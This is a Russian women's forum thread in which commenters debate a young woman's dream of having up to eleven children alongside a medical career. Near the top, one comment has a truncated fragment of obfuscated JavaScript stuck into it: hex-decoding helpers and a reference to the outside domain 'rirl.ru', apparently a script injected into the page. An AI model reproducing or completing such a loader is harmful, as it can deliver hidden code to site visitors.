Просто когда у вас будет двое детишек, может трое, вы встанете перед сложным выбором: идти по традиционному пути большинства женщин нашего общества или следовать своей мечте. От чего-то в любом случае придется отказаться.

Пока ваши рассуждения об этом выглядят очень несерьезными. Но вы не отказывайтесь так просто от своей мечты. А вдруг именно у вас получится :)

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да3 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
прокурор
19659 прокурор
Прокурор offline
Репутация : 29168
Комментариев 230 1
13 ноября 2015 05:45:51
2015-11-13 05:45:51

Начну пожалуй с хорошей поговорки: "не говори оп пока не перепрыгнешь". К чему я это? К тому, что теория и практика это разные вещи. Так что если после 2-3 ребенка вы все еще будете хотеть рожать - именно тогда ваша мечта станет осознанным выбором взрослого человека. Не факт конечно, но упустим этот момент.

Ну и самое важное - это понять что каждый ребенок - это маленькая личность; как маленькое отдельное государство. Припустим у вас родится 11 детей. Надо учитывать что в одних и тех же родителей рождаются совсем разные по характеру дети. И вполне возможно что не все захотят, к примеру, быть в составе футбольной команды. У всех них будут во-первых разные характеры и разные духовно-моральные потребности и вам, как матери, предстоит это все учитывать и относиться с пониманием. Но это не все. Также каждый ребенок будет нуждаться в большом кол-ве внимания, заботы, любви и расходов. Двум людям достаточно тяжело будет справиться с таким внушительным объемом эмоциональной и финансовой нагрузки.

Но все же я не исключаю возможности что ваша мечта может сбыться в позитивном смысле. Но вам надо это очень хорошо продумать, почитать литературу, понабраться опыта в разных сферах, ну и немножко подрасти в моральном плане. Мне кажется вы совсем еще юная и не совсем четко себе представляете свою мечту. Точнее ее реализацию.

Ответить
Поддерживаю Да1 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 441737
Комментариев 7605 30
13 ноября 2015 08:28:39
2015-11-13 08:28:39

Я по комментариям поняла что пока что я тут единственный человек, который знает не плохо семью с большим количеством детей. И даже не то что вы мечтаете о 4-11 детях, в той семье их живых 14 детей было на тот момент когда я познакомилась с их семьей и знаю эту семью по сей день. Со мной училась девочка уже после школы мы с ней познакомились и общаемся до сих пор. И не ее одну я знаю оттуда, еще общаюсь с ее племянницей, дочерью ее старшего брата. Все дети там родные приемных нет. Все родились от одного отца и матери. Были сильные чувства у родителей, он ее так сказать украл из отчего дома. Это и все что напишу я знаю из рассказов девочек этой семьи.

Автор обращаюсь к вам не витайте в облаках о таких мечтах. Я не могу сказать, что мечтать о большом количестве детей это плохо. Это хорошая мечта. Но все не так просто даже если вы и будете их рожать одного за другим. Даже если у вас будут двойни как вы пишите или как еще вы выражаетесь сразу бывает рожают 2-3-4 детей за раз. Вы еще пока очень молоденькая девушка. Я вам могу написать как и о 14 детях в семье и как мама имеющая двойню. Двойня это долгий труд. Я уже даже не говорю о трех и четырех рожденных сразу. И медицинское образование тут ни при чем. Хорошо конечно быть врачом и разбираться в лечении и лекарствах. И знать когда и куда обратится в случае чего. Но рождение и воспитание это несколько другое. Легко так сказать вот я мечтаю, но если вы решитесь их даже родить все 11 то вы должны понимать, что даже при хорошем доходе не все так просто. Во первых работать в частности придется отцу детей фактически одному. И вы ему будете уже не помощница в этом. Мало родить, там надо дать много любви и заботы каждому из них. Я как мама двойняшек знаю, что такое когда их сразу двое. Один возраст у детей. Хорошо когда они старше, а когда они груднички или до года. Обоим хочется дать все одинаково и любовь и ласку и заботу. Но угрызения совести меня посещали. Один спокойнее, другой нет. Понятно что тут больше внимания достается тому кто не спокойный. И мучаешься тем что вот с этим больше, а с другим нет. И обнимаешь их сразу двоих, а представьте их три и четыре. Двух обняла, а остальные будут в очереди стоять?С рождением большого количества детей надо многое учитывать. Хоть по одному, хоть погодками, хоть чуть больше разницей в возрасте между ними. Я когда младшего родила сама ощутила, что старшим меньше внимания уделяться стало. Маленький ребенок больше забирает внимание нежели те кто постарше. Начинается у детей ревность, вот мама больше с ним, чем со мной, значит любит его или ее больше, чем меня.

А что говорить о их образовании?Всех нужно выучить. Это не 70е годы уже, когда росли дети из знакомой мне семьи. Там подросли и все кто куда устраиваться стали. Сейчас ты без хорошего образования никто. Пока вы даже автор начнете реализовывать свою мечту, образование может стать даже в школе платным. А в садиках сколько нужно платить?Это вам не булку хлеба купить. Потом еще когда вырастут им нужно жилье. НЕ будут же все жить с вами все 11 человек. Квартиры тоже стоят никаких денег не хватит, даже и для очень обеспеченной семьи. Когда вы родите к примеру самого младшего старшему из 11, будет уже за 20 лет, это я так прикинула не считая и не высчитывая. Это вы из декрета не вылезать будете, даже если и выйдете то больничных будет предостаточно.

Вернусь к семье моих знакомых. Там только после 12 ребенка дали им квартиру 4х комнатную, в советские времена. Пришлось им делить одну комнату на пополам. И вот в пяти комнатах их жило не мало. Старших успели как то обеспечить квартирами. Когда их давали бесплатно. А младшие и по сей день не могут ее разделить. Носили одежду один за другим. Мама вечно с большими баулами домой с работы. Отец весь изработавшийся. Отец у них умер когда младшей 9 лет было. Младших мама одна уже до поднимала. Умерла чуть за 70 лет ей было. Пока она растила младших некоторые старшие упустились ею из вида. И выросли не совсем хорошими.

Я не собиралась вас пугать этой историей как и всем остальным. Но история мне знакома такая. Я не хочу сказать что все они выросли плохими. Есть у них достаточно хороших детей. Но не все так радужно как в мечтах. Я не осуждаю тех кто родил 5 и более детей. Но вот из данной семьи дети уже все давно взрослые и у них уже почти у всех есть даже внуки, ни у кого из них нет больше 3-4 детей. В среднем по 1-2 ребенка. Потому что они знают что такое когда несколько человек живут в одной комнате, когда ты донашиваешь вещи после 3-4 человек. Я общаюсь с младшей из них. И даже ей пришлось донашивать за сестрами. И дело даже не в достатках семьи. Пока вы старших обеспечиваете младшим практически достается все не новое. Потому что уже много отдано старшим.

Так что подумайте обо всем. Может я что то и упустила и не написала. Слишком много всего сразу приходит в голову когда знаешь как это все дается и когда это не просто мечта а реальность.

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Неалина
5436 Неалина
Неалина offline
Репутация : 441737
Комментариев 7605 30
13 ноября 2015 08:41:29
2015-11-13 08:41:29

Еще автор хочу сказать, что дети это не 11 платьев, купил и положил в шкаф и достал когда надо. Дети это ежедневный труд. При чем очень большой. Когда начинаешь мечтать надо хорошо понимать что это за мечта и что для нее нужно. В каждого ребенка помимо финансов, нужно вложить еще душу и отдать сердце. Это и не куклы с которыми здорово играть и кормить. Посадил за игрушечный столик и они сидят. Положил им по сломанной печенюшке в тарелочки и думаешь что накормила. Когда их так много то и порой себя наверно не помнишь уже потому что вся в детях. Это даже не воспитатель в детском саду. Привели детей родители и забрали детей вечером. Там не скажу что легко в садике, но и вечером воспитатели я думаю долго отходят от напряженного дня с таким количеством детей. А у вас этот садик будет круглые сутки с бессонными ночами.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гостюшка
Гостюшка

13 ноября 2015 09:37:23
2015-11-13 09:37:23
Сначала хотела высказаться резко, но потом поняла, что это будет похоже на диалог пьяного с радио. Конечно, нам (не врачам) не откуда узнать, что от ЭКО бывают тройни и четверни. Последние кстати редко бывают все здоровые, потому что все силы сначала брошены на сохранение беременности, хотя бы недель до 32-35, а потом этих крошек, по кило веса и даже меньше - в реанимации. Мне стыдно как НЕ МЕДИКУ, знать, что дцп редко определяется внутриутробно, что это РОДОВАЯ ТРАВМА. Я всегда хотела иметь большую семью, в планах хочу третьего ребеночка. Но, после двух, я уже не уверена, а хватит ли у меня сил поднять и его? Пока моему младшему 8 месяцев, старшему 3, 5 года. И я понимаю, что старшему я почти не уделяю внимание. Даже сейчас старший лежит в больнице, с бабушкой, а не с мамой! И младший тоже с температурой... Я не могу его собрать и прогуляться до больницы. Честно, мне становится страшно, что потом такие врачи, которые пишут с ошибками, лечат нас. Видимо там, где вы учитесь, проводят кастинг на самого упертого будущего врача. И пациент будет рыскать в интернетах, в поисках нужного лечения, потому что нарвется на такого "ЯЖЕВРАЧА". Вы так упорно отстаиваете свою точку зрения, хотя все ваши аргументы рассыпаются об общепризнанные факты. Честно говоря, было неприятно читать ваши комментарии, в них столько грубости и Яканья. Наверное вы и сейчас будете думать, что я вам завидую, т. к. вы ездите на " своей" машине и живёте в "своем" элитном коттедже. Конечно, даже не берете в расчёт, что это вам подарили родители. И ещё: зачем вы сейчас не предохраняетесь, если в планах у вас доучиться? То есть вы не будете брать академ? А грудничка спихнете на няню? Тогда увы нужно вам признать, что в данный момент у вас не будет сил и времени уделять все внимание своему малышу... Заметьте, одному...
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

13 ноября 2015 09:38:48
2015-11-13 09:38:48
О, я тоже мечтаю. Мечтаю получить нобелевскую премиею за великое открытие, в ближайшие пол года. Стать мисс мира 2016. Воскресить динозавров, сделав из хищников травоядных. Создать настоящего дракона и единорога. Покататься на симуране. Ну конечно, еще и выйти за короля Англии замуж. И все это на примерно 5 ближайших лет, так как, потом я хочу отдохнуть. Смотри как складно мы с вами мечтаем. Хотя знаете, мне кажется моя мечта куда более сбыточнее, чем ваша. Такая мечта, с вашим уровнем знаний о организме женщине, что вы станете хорошей мамой сразу для 11 детей, сможете их всем необходимым обеспечить, морально и материально, создать крепкую семью, да еще и отучиться, построив карьеру врача. Нет, все таки, на симуране покататься куда реальнее, чем все то, о чем вы сразу мечтаете.
Ответить
Поддерживаю Да2 / Нет0
A.A.A.
A.A.A.

13 ноября 2015 09:39:19
2015-11-13 09:39:19
Сиреневая Кошка, Да, возможно и получится. Я прекрасно понимаю, что они взаимоисключающие и что нужно выбрать одно, но полноценное. \r\nЯ просто буду верить. Некоторые мечтают о большом богатстве, но для этого ничего не делают, думаю, это тоже навряд ли исполнится или же маленькие девочки мечтают выйти замуж за принца и жить в своем королевстве или иметь розового пони. Тоже ведь просто мечты, которые в реальности и не совсем возможны. А я мечтаю о большое семье и это уже более приземленнее. Мечта моего детства.
Ответить
Поддерживаю Да0 / Нет0
Азиатка
8752 Азиатка
Азиатка offline
Репутация : 813708
Комментариев 5797 20
13 ноября 2015 11:14:54
2015-11-13 11:14:54

Опущу моменты, что с толпой детей могут возникнуть проблемы с финансами, отсутствием должного воспитания, муж может "слиться", сама заболеть, дети доставлять проблемы от нехватки времени и внимания.... Рисков немало. Но самый страшный риск в моих глазах не невозможность построить карьеру, а риск хоронить собственных детей. Я росла в среде, где такие семьи нередко встречались. И муж из такого же уклада. Я не видела ни одной семьи, где не было бы выкидыша, мертворожденного, смерти в малолетстве! Почти каждая такая мама хоронила собственное дитя. Это страшно! Не знаю как они это переживали, может, относились философски и жили, рожали дальше. Но одной этой причины достаточно, чтобы спуститься с облаков. Из моих ровесниц, имеющих по 5 и более детей почти никто не работает или от случая к случаю. Для детей нужен хотя бы один член семьи, который будет полностью поглощен их воспитанием и взращиванием.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

13 ноября 2015 12:59:45
2015-11-13 12:59:45
Автор, Вы молодец! У Вас мечта - иметь большую семью. Это замечательно. Не слушайте никого, кроме Вашего жениха, и продолжайте двигаться по направлению к мечте! Тем более, что ВЫ указали 4-11 детей. 6, к примеру, вполне реально поднять, тем более, если Вы материально обеспечены. Просто у нас менталитет такой - у всех должно быть всё примерно одинаковое. Некоторые вообще пишут, что сможете ли Вы купить недешевые телефоны и так далее. Как по мне: это чепуха. Я общалась с семьями, где по 5 детей. И они, каждый из членов семьи, были более сплоченные и радостные. А у них, кстати, была не такая хорошая финансовая ситуация, как у Вас, автор. И кстати, эти семьи тоже подвергали такому же своеобразному осуждению. Многие говорили: "Зачем им это?", "Нафиг надо", а некоторые и в лицо могли совсем нетактично спросить: " А зачем Вам столько детей?". В Германии вообще многодетная семья таковою считается при наличии в семье 7 детей. Так что зря Вы сюда написали. Больше людей и на сайте, и в обществе, Вас поддерживать не будут. Думаю, это первое, с чем придется смириться, если хотите столько детей. Какая бы финансовая ситуация у Вас не была.
Ответить
Поддерживаю Да1 / Нет3
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235647
Комментариев 1762 1
13 ноября 2015 13:29:51
2015-11-13 13:29:51

Гость, ну вы сравнили 5 или 11. При том автор указала, что желательно 11 так как она мечтает о своей футбольной команде.

Ответить
Поддерживаю Да0 / Нет0
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235647
Комментариев 1762 1
13 ноября 2015 13:33:31
2015-11-13 13:33:31

Да я просто уверена после рождения первого ребёнка, после проведённых пару бессоных ночей, после криков на колики и др. проблем, автор задумается о смене своей мечты, на более реальную

Ответить
Поддерживаю Да2 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
13 ноября 2015 14:44:27
2015-11-13 14:44:27

A. A. A., да перестаньте вы со своими коттеджами и машинами: во-первых, выглядит это как дешевые понты, во-вторых, знаете жизнь - это штука такая, вы можете реально иметь коттеджы, дома, острова, а счастья не будет, ни одного ребенка Бог не даст и вот так бывает... Мечтать то, конечно, мечтайте, никто не может запретить мечтать, но поменьше понтов, пафоса и поменьше стройте из себя умную, где-то промолчите, а то вы много говорите и выглядите глупой.

Поверьте, невозможно совмещать карьеру и столько детей. Почему обычно карьеристы вообще без семей? Да потому, что все время посвещается работе, а на семью времени просто нет. Вот сколько знаю семей, то с большим количеством детей карьеры не получалось, приходилось что-то выбирать и чем-то чертвовать. Нет, конечно, вы можете заниматься карьерой, но детей будет тогда воспитывать улица, а не вы, а ведь это же ваша мечта. Все правильно сказала Сиреневая Кошка, у вас мечты взаимоисключающие друг друга.

Мало их родить, нужно еще воспитать, дать образование, а образования у нас сейчас уже мало бесплатного осталось, а стоит оно ого-го сколько, а тут если 11 детей. У меня сколько знакомых многодетных семей, так в большинстве своем все без нормального образования, воспитаны черти как, недолюблены, тк ну много их в семье, живут друг у друга на голове, так всю жизнь проблема была с финансами. Вообщем, ужас.

A. A. A., о розовых пони мечтают лет в 5, а вам 20!!!!!! Пора жить реальной жизнью, а не иллюзиями и трезво смотреть на вещи!

Гость, {#}{#} Супер!

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Нежная роза
8829 Нежная роза
Нежная роза offline
Репутация : 154526
Комментариев 2288 27
13 ноября 2015 14:56:31
2015-11-13 14:56:31
Автор, мне все равно, сколько у вас денег. И если я спросила об этом, то лишь потому, что обычно материальное положение не дает женщинам иметь много детей, даже если этого хочется. Ну, если у вашего семейства столько денег, что хватит на футбольную команду, то не вижу ничего невозможного. Наймете няню, домработницу. Даже, возможно, работать сможете в перерывах между декретами.
Ответить
Поддерживаю Да0 / Нет0
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
Honey Lee
13836 Honey Lee
Honey Lee offline
Репутация : 48731
Комментариев 1165 6
13 ноября 2015 16:08:26
2015-11-13 16:08:26

A. A. A., с материальной базой нет проблем, я так понимаю, не вы ее выстраивали, ни ваш парень, а ваши РОДИТЕЛИ. Т. е. вы собираетесь рожать и воспитывать на заработанное вашими родителями?

Если свадьба летом, может подождать чуток с беременностью? Ждать то и так недолго. Даже чисто эстетически свадебное платье на девушки без беременного животика смотрится лучше.

Ответить
Поддерживаю Да0 / Нет0


13 ноября 2015 17:30:31
2015-11-13 17:30:31
Азиатка, Это ваш личный жизненный опыт, про то, что видели такие семьи. Я же росла в других условиях. В общем оставайтесь при своем мнении, а я останусь при своем. Я устала уже каждому из вас доказывать, что мечтать не вредно. И 4-11 детей, но желательно 11. Возможно будет и 4, а может и 7, а вдруг и 11. Одному Богу известно.
Ответить
Поддерживаю Да0 / Нет0
троянда
троянда

15 ноября 2015 01:14:51
2015-11-15 01:14:51
А мне кажется, что нужно в первую очередь получать образование, но если вдруг окажется, что вы беременны-рожайте и уже потом вы поймете, что вам надо от жизни и сколько детей вы сможете родить. Что для вас важнее. Жизнь все раставляет по местам. Я вот мечтала о карьере и не думала о детях, а в итоге забеременела на 5-м курсе. Аккадемку не брала доучилась и ляльку родила даже немного успела поработать после ВУЗа, все о карьере мечтала. Но потом родилась 2-я слабенькая и недоношенная. На карьере поставила крест и детей как бы не хотела больше родить не смогу. Вот так вот.
Ответить
Поддерживаю Да0 / Нет0
Солнечный_Неадекват
14392 Солнечный_Неадекват
Солнечный_Неадекват offline
  • Мисс Находчивость
Репутация : 173848
Комментариев 1594 0
16 ноября 2015 10:59:20
2015-11-16 10:59:20

Мечтать не вредно.

Автор, хорошо желать большую семью. Тут не поспоришь.

Повеселило про футбольную команду))) Вы будете 11 девочек рожать или 11 мальчиков? Или у Вас будет уникальная футбольная солянка?)))

Когда Вы говорите про обеспеченных родителей, то складывается мнение о Вас, как о легкомысленной особе. Уберем родительскую помощь. Они вырастили Вас и не обязаны Вас содержать. Так должен рассуждать самодостаточный и взрослый человек.

Пусть у Вас будет дом и Ваш хорошо зарабатывающий парень. Как обеспечить 11 детей? У Вас уже + ввиде Вашего дома, который тоже, кстати, необходимо содержать. НО. ВЫ можете хоть на минуточку представить, сколько уходит денег на детей? Нет? Наверно потому, что Вы своим трудом денег не заработали больших. Вы своим трудом денег больших не заработаете, т. к чтобы в этой области хорошо зарабатывать, необходимо много работать и развиваться в этом направлении. Времени у Вас на это не будет точно. Значит, обеспечить большую семью должен Ваш молодой человек, опять же без помощи родителей. Что значит он "хорошо зарабатывает"? Он миллионер?

Я просто как представлю... допустим Ваш ребенок не сможет поступить в институт на бесплатную основу. В моем городе я училась по достаточно не дорогой специальности, т. е на 1 курсе год обучения обходился в 30 т. рублей, на 5 - 70 т. рублей. Думаю, что в Москве придется отстегнуть тысяч 100 в среднем. Платить 5 лет на одного. А если у Вас 11 детей? Я даже считать точно не буду. Можете представить, сколько придется платить за каждого ребенка, отправляя их друг за другом в универ каждый год?)))

Потом еще и жилье покупать каждому))) А почему нет? Вам же родители подарили. Вот и Вы своим подарите, а то бедные дедушки и бабушки замучается дома и квартиры раздавать))) И это мы исключаем все прочие расходы на еду, обслуживание дома, машин, школы, одежды, развлечений, болезни и т. д. Вам, наверно и отдыхать за границей хочется? Здорово оплачивать отпуск на 13 человек без помощи родителей и без Вашей зп))) Можно, конечно, дождаться, когда возраст к пенсии подойдет или сплавлять детишек на нянь или родителей)))

А как Вы будете распределять любовь и внимание на всех детей? Часто в больших семьях не успевают уделять внимание всем, и дети порой идут не той дорогой.

Да вообще много всяких моментов, как уже выше писали)))

"Учеба или детишки" - без учебы не будет карьеры, о которой Вы мечатете. Хотя ее у Вас и так не будет с 11 детьми. Если, конечно, Вы нянь не наймете))) Вы мечтаете и о том и о том)))

Отучиться Вам однозначно надо. А когда родите хотя бы одного, тогда и сможеть здраво мечать о таком количестве детей. Но хочу повторить, что не стоит возлагать надежды на родителей. Вы хотите свою собственную семью, так и обеспечивайте ее с мужем сами.

Ответить
Поддерживаю Да2 / Нет0
Кекс, нартортики, сладкий ролл.
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 121205
Комментариев 1101 17
17 ноября 2015 07:45:58
2015-11-17 07:45:58
Согласна в какой-то степени с Читательницей! Овуляция - дело, конечно, хорошее, и наверное каждая, абсолютно каждая девочка об этом знает, даже не надо здесь быть врачом) . НО!!!! НО!!!! Даже в овуляцию, при огромном желании не у всех получается забеременеть, не говоря уже о других днях. Детей дает Бог. Хоть какая здоровая система и овуляция будет, а вот.... а вот так бывает - нет детей , их просто нет. Но я Вам конечно, желаю быстро забеременеть, без проблем и достигнуть своей мечты - никто не против. Просто почему-то читая историю, я лично почувствовала какую-то надменность автора что-ли, может я и ошибаюсь. Удачи Вам.
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 121205
Комментариев 1101 17
17 ноября 2015 07:51:32
2015-11-17 07:51:32
Просто очень многие девочки уверенны , что как только в овуляцию произойдет половой акт, то сразу и произойдет беременность. Я тоже так думала))) Но жизнь показывает (не медицина, заметьте) что иногда на то чтобы случилась заветная беременность, уходит год, два и более. К сожалению, но это жизнь. К счастью, не у всех. У кого-то и при первом разе получится - чего Вам искренне желаю, тогда возможно и 11 деток, тем более Вы молоды. просто сильно не стройте иллюзий по поводу того, что не забеременели сразу только из-за того, что в тот день не было овуляции.
Ответить
Поддерживаю Да0 / Нет0
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 121205
Комментариев 1101 17
17 ноября 2015 07:54:42
2015-11-17 07:54:42
у меня тоже есть мечта - хотя бы одного, здорового ребенка. Не важно: мальчик, девочка. хотя бы одного. Надеюсь, наши с Вами мечты сбудутся когда-нибудь))))))))))
Ответить
Поддерживаю Да1 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке